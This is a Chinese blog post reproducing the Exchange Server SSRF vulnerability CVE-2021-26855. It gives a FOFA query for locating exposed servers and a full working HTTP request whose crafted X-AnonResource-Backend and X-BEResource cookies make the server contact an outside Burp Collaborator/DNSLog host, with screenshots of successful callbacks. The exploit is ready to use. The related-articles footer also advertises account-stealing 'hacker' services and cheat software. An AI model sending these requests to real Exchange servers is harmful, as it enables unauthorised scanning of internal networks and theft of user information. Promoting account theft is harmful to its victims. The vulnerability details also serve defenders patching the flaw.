Exchange SSRF(CVE-2021-26855)

访客3年前黑客资讯1052

0x01?漏洞说明

Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。

0x02?影响版本

Exchange 2013 Versions < 15.00.1497.012,

Exchange 2016 CU18 < 15.01.2106.013,

Exchange 2016 CU19 < 15.01.2176.009,

Exchange 2019 CU7 < 15.02.0721.013,

Exchange 2019 CU8 < 15.02.0792.010。

0x03?漏洞复现

fofa 搜索:app=“Exchange”(注意:互联网的非授权利用属于违法行为)

访问outlook页面

1615265021_6046fcfdc6684cef8326a.png!small?1615265022085

开启burp抓包,构造数据包:

GET /owa/auth/x.js HTTP/1.1
Host: IP
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

1615265142_6046fd76402c223ae9f32.png!small?1615265142811

访问url为:https://xxx.xxx.xxx.xxx/owa/auth/x.js(貌似x.js可以随便构造)

构造Cookie信息为:

Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

其中"oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net"为dnslog信息。

可使用burp自带的dnglog进行验证:

点击burp,选择Burp collaborator client:

1615265254_6046fde68ce0c47016b0b.png!small?1615265255251


1615265329_6046fe31805c3149f52b6.png!small?1615265330005

1615265489_6046fed12247e2b2ac5f3.png!small?1615265491318

各个DNSLog提示信息不一样,但是都可以成功返回信息:

1.dnslog.cn

1615265527_6046fef7a2961328c9acb.png!small?1615265528287

1615265540_6046ff04dc224a15f28e2.png!small?1615265541498

2.ceye:

1615265636_6046ff64de1030d2a4960.png!small?1615265637888

1615265637_6046ff6591c651911e085.png!small?1615265637888

3.零组Dnslog

1615265721_6046ffb9f254e53382305.png!small?1615265722565

1615265726_6046ffbef0535c4e9ef53.png!small?1615265727561


0x04?修复建议

升级到最新安全版本

结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

相关文章

textarea换行_在textarea中如何换行的实现总汇

html的textarea内容显示的时刻怎么换行?输入的时刻换了行,然则读取出来的时刻是连在一起的,要怎么才可以显示换行? 方式一:行使pre 1、在textarea输出的div中添加如下css样式...

我想知道,我朋友去酒店开房啦,出示了身份证

5G 时代都要来了,但令人糟心的是,4G 路由上的窟窿我们还没补完呢。 据 BleepingComputer 美国时间8月12日报道, Pen Test Partners 研究人员 G Ric...

手机黑客网(手机黑客网站免费盗号)-黑客技术棋牌透视软件

手机黑客网(手机黑客网站免费盗号)-黑客技术棋牌透视软件

手机黑客网(手机黑客网站免费盗号)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务...

唐人街探案二中的黑客扮演者(唐人街探案二里面的黑客是谁演的)

唐人街探案二中的黑客扮演者(唐人街探案二里面的黑客是谁演的)

本文目录一览: 1、kiko《唐人街探案2》是谁? 2、唐人街探案2的演员有哪些 3、《唐人街探案2》女黑客是谁? 4、唐人街探案2当中的女黑客KIKO是谁演的 5、《唐人街探案》二里...

九格子重庆火锅如何加盟?加盟流程如下

九格子重庆火锅如何加盟?加盟流程如下

九格子重庆暖锅加盟项目如今在市场上的成长长短常不错的,许多加盟商都对这个加盟项目很是的看好,各人都想要加盟到个中来,成为该行业中的一员,假如你对九格子重庆暖锅加盟项目也感乐趣,那么你此刻就和我一起来看...

0.9元购买10包抽纸 凌晨卡点领券 不限制地区用户

本文是0.9米购买10包抽纸 凌晨卡点领券 不限制地区用户 活动介绍 活动页面说是湖南联通才可以,其实不限制地区的,三网用户都可以;手机验证先领取9米优惠券,每天上午9点...